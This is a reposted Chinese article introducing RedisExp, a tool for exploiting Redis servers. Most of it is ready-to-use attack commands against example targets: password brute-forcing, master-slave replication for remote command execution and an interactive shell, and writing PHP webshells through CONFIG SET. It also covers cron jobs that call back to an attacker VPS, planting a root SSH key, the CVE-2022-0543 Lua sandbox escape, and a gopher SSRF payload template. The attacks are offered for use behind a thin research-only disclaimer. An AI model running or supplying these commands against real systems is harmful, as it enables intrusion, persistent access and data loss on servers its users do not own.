一款用于Redis漏洞的利用工具

news/2024/9/19 15:12:18/文章来源:https://www.cnblogs.com/o-O-oO/p/18409312

Hack分享吧

声明

该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。

工具介绍

@yuyan-sec使用golang写的一款Redis漏洞利用工具。
注意:主从复制会清空数据,主从复制会清空数据,主从复制会清空数据,请注意使用!请注意使用!请注意使用!

工具使用

██████╗ ███████╗██████╗ ██╗███████╗    ███████╗██╗  ██╗██████╗
██╔══██╗██╔════╝██╔══██╗██║██╔════╝    ██╔════╝╚██╗██╔╝██╔══██╗
██████╔╝█████╗  ██║  ██║██║███████╗    █████╗   ╚███╔╝ ██████╔╝
██╔══██╗██╔══╝  ██║  ██║██║╚════██║    ██╔══╝   ██╔██╗ ██╔═══╝
██║  ██║███████╗██████╔╝██║███████║    ███████╗██╔╝ ██╗██║
╚═╝  ╚═╝╚══════╝╚═════╝ ╚═╝╚══════╝    ╚══════╝╚═╝  ╚═╝╚═╝

基本连接:

RedisExp.exe -r 192.168.19.1 -p 6379 -w 123456

爆破 Redis 密码:

RedisExp.exe brute -r 目标IP -p 目标端口 -f 字典文件RedisExp.exe brute -r 192.168.19.1 -f pass.txt

主从复制执行命令 (默认是交互式 shell)(Redis版本 4.x - 5.x):

RedisExp.exe -r 目标IP -p 目标端口 -w 密码 -L 本地IP -P 本地Port [-c whoami 单次执行]RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1 -c whoami (单次执行)RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1 -f exp.so (Linux)

主从复制文件上传 (windows 中文需要设置gbk)(Redis版本 4.x - 5.x):

RedisExp.exe -r 目标IP -p 目标端口 -w 密码 -L 本地IP -P 本地Port -d 目标路径 -f 目标文件名 -F 本地文件RedisExp.exe upload -r 192.168.19.1 -L 127.0.0.1 -d c:\\中文\\ -f shell.php -F shell.txt -gRedisExp.exe upload -r 192.168.19.1 -L 127.0.0.1 -f shell.php -F shell.txt

关闭主从复制

RedisExp.exe close -r 192.168.19.1

Lua沙盒绕过命令执行 CVE-2022-0543:

RedisExp.exe lua -r 192.168.19.6 -c whoami

备份写 Webshell:

  1. Windows 中文路径要设置gbk, linux 中文路径不用设置。
  2. webshell的内容是base64,使用 -b 参数来解码。工具默认会关闭Redis压缩进行写入,写入后再恢复。
RedisExp.exe shell -r 目标IP -p 目标端口 -w 密码 -d 目标路径 -f 目标文件名 -s Webshell内容RedisExp.exe shell -r 192.168.19.1 -d c:\\中文\\ -f shell.php -s "<?php phpinfo();?>" -gRedisExp.exe shell -r 192.168.19.1 -d c:\\中文\\ -f shell.php -s "PD9waHAgcGhwaW5mbygpOz8+" -g -b

Linux 写计划任务:

RedisExp.exe cron -r 目标IP -p 目标端口 -w 密码 -L VpsIP -P VpsPortRedisExp.exe cron -r 192.168.19.1 -L 127.0.0.1 -P 2222

Linux 写 SSH 公钥:

RedisExp.exe ssh -r 目标IP -p 目标端口 -w 密码 -n 用户名 -s 公钥RedisExp.exe ssh -r 192.168.19.1 -u root -s "ssh-rsa AAAAB"

执行 Redis 命令:

RedisExp.exe cli -r 192.168.19.1

生成 gopher ssrf redis payload:

RedisExp.exe gopher -f 1.txt

gopher 写webshell模板

flushall
config set dir /tmp
config set dbfilename shell.php
set 'webshell' '<?php phpinfo();?>'
save

关闭Redis压缩(写入乱码的时候可以关闭压缩,工具在写入shell的时候默认添加了关闭压缩,写入后再恢复开启压缩)

config set rdbcompression no

具体命令使用-h来查看exp.dll和exp.so来自https://github.com/0671/RabR,已经把内容分别加载到dll.go 和so.go可以直接调用。
Windows中文路径需要设置gbk,使用-g参数就可以了。在写入webshell的时候因为有一些特殊字符,可以使用把webshell进行base64编码,然后使用-b参数来解码

报错
出现以下报错有可能是Redis版本太高,exp.so没有执行权限导致加载不了,具体需要查看服务端的报错。

工具报错:[ERR Error loading the extension. Please check the server logs.] module load /tmp/exp.so

服务端报错:Module /tmp/exp.so failed to load: It does not have execute permissions.

项目地址

https://github.com/yuyan-sec/RedisEXP

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/795753.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

AGC007F Shik and Copying String

AGC007F Shik and Copying String

涉及知识点:Ad-hoc,贪心 题意 Link 给出两个长度相同的字符串 \(S,T\),定义一次操作为: 从头至尾处理每一位,每位可以变成上一位,或者不变。 求最少对 \(S\) 进行多少次操作使得 \(S=T\)。 思路 引理 可以发现,一次操作其实类似于选择一些点 \(l\),从左到右覆盖它后面的…
阅读更多...
全网最适合入门的面向对象编程教程:47 Python函数方法与接口-回调函数Callback

全网最适合入门的面向对象编程教程:47 Python函数方法与接口-回调函数Callback

回调函数是编程中一种非常常见的模式,用于将函数作为参数传递给其他函数或方法。这种模式在 Python 中广泛应用于事件处理、异步编程、函数式编程等场景。全网最适合入门的面向对象编程教程:47 Python 函数方法与接口-回调函数 Callback摘要: 回调函数是编程中一种非常常见的…
阅读更多...
如何把一个吃灰的 Kindle 设置成一个墨水屏幕的时钟 All In One

如何把一个吃灰的 Kindle 设置成一个墨水屏幕的时钟 All In One

如何把一个吃灰的 Kindle 设置成一个墨水屏幕的时钟 All In One Kindle 电子书如何把一个吃灰的 Kindle 设置成一个墨水屏幕的时钟 All In OneKindle 电子书https://www.bilibili.com/video/BV1nY4y1e7gC/?t=375 demosKindle Paperwhite 7 电子书阅读器(4GB)Kindle Paperwhi…
阅读更多...
基于小波神经网络的数据分类算法matlab仿真

基于小波神经网络的数据分类算法matlab仿真

1.程序功能描述 基于小波神经网络的数据分类算法。输入为5个特征值,输出为判断(是,否)。拿50组数据对本算法作为训练组,后30组数据作为验证组。这里,我们首先调用数据,然后对50组数据进行训练,然后对30组数据进行识别测试。 2.测试软件版本以及运行结果展示MATL…
阅读更多...
基于GWO灰狼优化的CNN-LSTM的时间序列回归预测matlab仿真

基于GWO灰狼优化的CNN-LSTM的时间序列回归预测matlab仿真

1.算法运行效果图预览 (完整程序运行后无水印) 2.算法运行软件版本 matlab2022a3.部分核心程序 (完整版代码包含详细中文注释和操作步骤视频)LR = Alpx(1); numHiddenUnits1 = floor(Alpx(2))+1;% 定义隐藏层中LSTM单元的数量 numHiddenUnits2 = floor(Alpx(3)…
阅读更多...
代码整洁之道--读书笔记(8)

代码整洁之道--读书笔记(8)

代码整洁之道简介: 本书是编程大师“Bob 大叔”40余年编程生涯的心得体会的总结,讲解要成为真正专业的程序员需要具备什么样的态度,需要遵循什么样的原则,需要采取什么样的行动。作者以自己以及身边的同事走过的弯路、犯过的错误为例,意在为后来者引路,助其职业生涯迈上更…
阅读更多...
java学习9.11

java学习9.11

IDEA里导入mybatis,lombok等依赖成功连接好数据库。 并将MYSQL数据库同时用navicat连接便利创建表等操作。设计实体类student并在数据库设计好表接下来就是如何实现在数据库里的增删改查 设计接口类mapper,将操作简化最后能正常运行实现功能。 总的来说这一块内容,刚开始学,…
阅读更多...
LOJ4222 「IOI2024」马赛克上色 题解

LOJ4222 「IOI2024」马赛克上色 题解

题目描述 给定长为 \(n\) 、下标从零开始的 \(01\) 序列 \(x,y\) ,保证 \(x_0=y_0\) 。 令 \(col_{0,j}=x_j,col_{i,0}=y_i\) ,对 \(\forall 1\le i\lt n,1\le j\lt n\) , \(col_{i,j}=[col_{i-1,j}=0\and col_{i,j-1}=0]\) 。 \(q\) 次询问,给定 \(u,d,l,r\) ,求 \(\sum_…
阅读更多...
2024 必收藏✨免费手机铃声下载网站大公开

2024 必收藏✨免费手机铃声下载网站大公开

最推荐的方式,当然是在线网站了。1.北岛铃声网 https://www.beidaols.cn/优点:免费下载:用户可以免费获取各种手机铃声,无需支付费用。 铃声多样:提供了丰富的铃声选择,满足不同用户的个性化需求。 教程详细:提供了详细的设置苹果铃声的教程,对于不熟悉苹果手机设置的…
阅读更多...
原神蒙德-Typora模板

原神蒙德-Typora模板

基于Newsprint主题开发的一种Typora模板新建模板 打开Typora - 文件 - 偏好设置 - 外观 - 打开主题文件夹 找到其中的 Newsprint (应该有一个文件夹+一个css,都要) ,拷贝副本,重命名(我命名的是“custom”),一定要这一步,不然后期更新的时候会覆盖 修改 打开其中的 cu…
阅读更多...
学习日历-2024/9/11

学习日历-2024/9/11

LinkList集合 底层数据结构时双链表,查询慢,首尾操作的速度是极快的,所以多了很多的首尾操作在使用迭代器或者增强for循环遍历集合的过程中,不要使用集合的方法去添加或者删除元素即可 SQL DML-添加数据 1.给指定字段添加数据 INSERT INTO 表名(字段名1,字段名2,...) VALUES(值…
阅读更多...
真实Redmi note11t pro澎湃刷机

真实Redmi note11t pro澎湃刷机

解决:澎湃如何刷回miui13-14系统 澎湃bl解锁后结合视频进行刷机 刷机包下载地址 刷机工具1. 备份 首先先备份当前资料小米云备份使用小米手机助手备份资料2. 澎湃bl解锁 手机打开开发者 ​​ 连接电脑usb文件传输模式 ‍ 打开澎湃bl解锁 ,双击 点我开始解锁.bat 运行以后手机会…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023